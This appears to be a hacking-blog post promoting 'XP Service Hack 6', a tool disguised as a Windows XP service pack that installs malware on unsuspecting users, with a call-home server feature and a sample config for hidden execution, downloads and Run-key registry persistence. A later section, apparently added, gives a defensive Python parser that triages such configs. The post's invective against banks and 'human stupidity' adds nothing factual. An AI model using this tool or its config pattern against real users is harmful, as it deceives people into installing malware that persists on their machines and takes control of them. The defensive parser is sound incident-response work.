A new hack tool in the image of Windows XP service pack updates that allows you to install malware, or other applications, on an unsuspecting user during penetration testing. This tool was modelled after the installation process of Windows XP service packs and allows you to configure the application. The software supports x86, x64, Itanium and all processors listed.

Windows XP Service Hack 6

As we all know, Windows XP has come to an unfortunate end. Unfortunate, really? Probably not. And a lot of people (especially major corporations [WHO WOULD HAVE THOUGHT?!?!?!?], which are paying Microsoft to stay in bed with them longer) are still running Windows XP. Whether it be because of legacy requirements, core functionality requirements, or libraries that they still need. Who knows? The list can go on. In any case, the cheap idiots don't always seem to have the money to expand (banks), even though they are within inches of taking everything we own, and probably soon at gun point. Hey, they did it with the school system, so why not change tactics?

So, this had me thinking. Why not produce something some penetration testers, or whoever is involved in the security industry, may be able to utilize? I'm not releasing this as an ode to causing havoc. Just testing! So if your intentions are of the bad kind (I don't care if you have cookies), don't download our tools.

The major point behind the software is social engineering, and as we all know... there is no patch for human stupidity. So without further babbling I shall introduce the XP Service Hack 6 tool.

(Screenshot: demonstrating the details of the first view)

Service Hack 6 comes with a command-line driven option set for its configuration methods. Where you see the name of the "patch" in this example, lower-case -c tells the program to clear the settings you've specified, while upper-case -C tells the patch to enter configuration mode. The examples below demonstrate this.

(Screenshot: view of running the application in configuration mode with upper-case -C)

(Screenshot: view of clearing the configurations in the application using lower-case -c)

The example above is what the user would see when they run the application. Right when the application is run, it automatically checks for and installs your configuration file. If no configuration file is specified, it will contact the servers that are under your control. Each server may be entered as a comma-separated value, so you may enter as many servers as you choose. However, this is only for call-home capabilities. The other options were implemented so you may rename your configuration file to whichever file name you choose: config.xml, config.exe, this.something. Any name is sound so long as the file is created and included with the application when it is sent. If you do not wish to include a configuration file, you can (in later versions) specify a download location from which to fetch a configuration file and read it to execute its functions.

Currently the application supports functions to execute, download, copy and put information to registry paths. You can also kill windows and applications from within the configuration file. Below is a sample configuration file with the meaning of each line next to it.

get, C:\windows\filename.exe //SPECIFY A SITE AND FILE AND WHERE TO STORE
execute C:\windows\system32\cmd.exe //EXECUTE A FILE IN NORMAL VIEW
putreg hkey_local_machine\software\microsoft\windows\run, fname, fpath //PUT INFORMATION TO A REGISTRY PATH
cp C:\camera.log, C:\camera2_.log //COPY A FILE FROM AND TO A LOCATION
killwnd Registry Editor // KILL A WINDOW BY NAME
exech C:\windows\regedit.exe //EXECUTE A FILE IN HIDDEN MODE.
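For incident responders who recover one of these configuration files from a host, the following is an added example, not code from the tool or from this post, of a small triage parser for the line format shown above: it splits each line into a command and its arguments, flags the entries that matter most for response (remote download, hidden execution, Run-key persistence), and pulls out the file paths to hunt for on the machine. The grammar (first token is the command, the remaining comma-separated tokens are its arguments, `//` starts a comment), the persistence-key list and the embedded sample config are assumptions reconstructed from the six-line sample; the real tool's parser may differ.

```python
import re
from dataclasses import dataclass

# Command keywords as listed on the page; anything else is reported as unknown.
KNOWN_COMMANDS = {"get", "execute", "exech", "putreg", "cp", "killwnd"}

# Registry key fragments treated as persistence (assumption: case-insensitive
# substring match against the first putreg argument).
PERSISTENCE_KEYS = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\run",
)

# Constructed sample, copied from the six-line sample above.
SAMPLE_CONFIG = r"""
get, C:\windows\filename.exe //SPECIFY A SITE AND FILE AND WHERE TO STORE
execute C:\windows\system32\cmd.exe //EXECUTE A FILE IN NORMAL VIEW
putreg hkey_local_machine\software\microsoft\windows\run, fname, fpath //PUT INFORMATION TO A REGISTRY PATH
cp C:\camera.log, C:\camera2_.log //COPY A FILE FROM AND TO A LOCATION
killwnd Registry Editor // KILL A WINDOW BY NAME
exech C:\windows\regedit.exe //EXECUTE A FILE IN HIDDEN MODE.
"""


@dataclass
class Entry:
    line_no: int
    command: str
    args: list
    comment: str = ""


def parse_config(text: str) -> list:
    """Parse the assumed grammar: <command>[,] <arg1>, <arg2>, ... [//comment]."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line, _, comment = raw.partition("//")
        line = line.strip()
        if not line:
            continue
        # The command is the first word; an optional comma may follow it.
        m = re.match(r"^(\w+)\s*,?\s*(.*)$", line)
        if not m:
            continue
        cmd, rest = m.group(1).lower(), m.group(2)
        args = [a.strip() for a in rest.split(",") if a.strip()] if rest else []
        entries.append(Entry(n, cmd, args, comment.strip()))
    return entries


def triage(entries: list) -> list:
    """Return (line_no, severity, description) for every entry."""
    findings = []
    for e in entries:
        first = e.args[0] if e.args else "?"
        if e.command not in KNOWN_COMMANDS:
            findings.append((e.line_no, "low", f"unknown command '{e.command}'"))
        elif e.command == "putreg":
            key = first.lower()
            if any(k in key for k in PERSISTENCE_KEYS):
                findings.append((e.line_no, "high", "registry persistence via Run key: " + key))
            else:
                findings.append((e.line_no, "medium", "registry write: " + key))
        elif e.command == "exech":
            findings.append((e.line_no, "high", "hidden execution of " + first))
        elif e.command == "get":
            findings.append((e.line_no, "high", "remote download stored at " + first))
        elif e.command == "execute":
            findings.append((e.line_no, "medium", "visible execution of " + first))
        elif e.command == "cp":
            findings.append((e.line_no, "medium", "file copy: " + " -> ".join(e.args)))
        elif e.command == "killwnd":
            findings.append((e.line_no, "medium", "kills window titled: " + " ".join(e.args)))
    return findings


def extract_paths(entries: list) -> list:
    """Collect every Windows file path named in the config, for host hunting."""
    paths = set()
    for e in entries:
        for a in e.args:
            paths.update(re.findall(r"[A-Za-z]:\\[^\s,]+", a))
    return sorted(paths)


if __name__ == "__main__":
    parsed = parse_config(SAMPLE_CONFIG)
    for line_no, sev, desc in triage(parsed):
        print(f"line {line_no:>2} [{sev:>6}] {desc}")
    print("paths to hunt:", extract_paths(parsed))
```

The severity levels are a triage convention chosen for this example, not something the tool defines; the point is that the config is plain text, so the commands it would run and the files it would drop can be read off before anything is executed.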

Please be advised that the end users, or the boxes you are targeting, need .NET Framework 4.0 to operate this. Without .NET it will be pointless. I may code an extension onto the application, or a standalone application, called Service Hack 6 Balloon. What this does is make the "patch" larger in size so it appears to be a real patch. Should you require any additions to the backend, let me know. Drop me a line!

Service Hack 6 allows you to specifically target Windows XP boxes using versioning information; however, it will error and install the malware on other operating systems, too! Once the application errors, it quits. So, your target needs to be on Windows XP for the full theatrics to be visible.

If you like the tool, do me a solid and share with the community! I would appreciate it, and I'm sure others would, too!

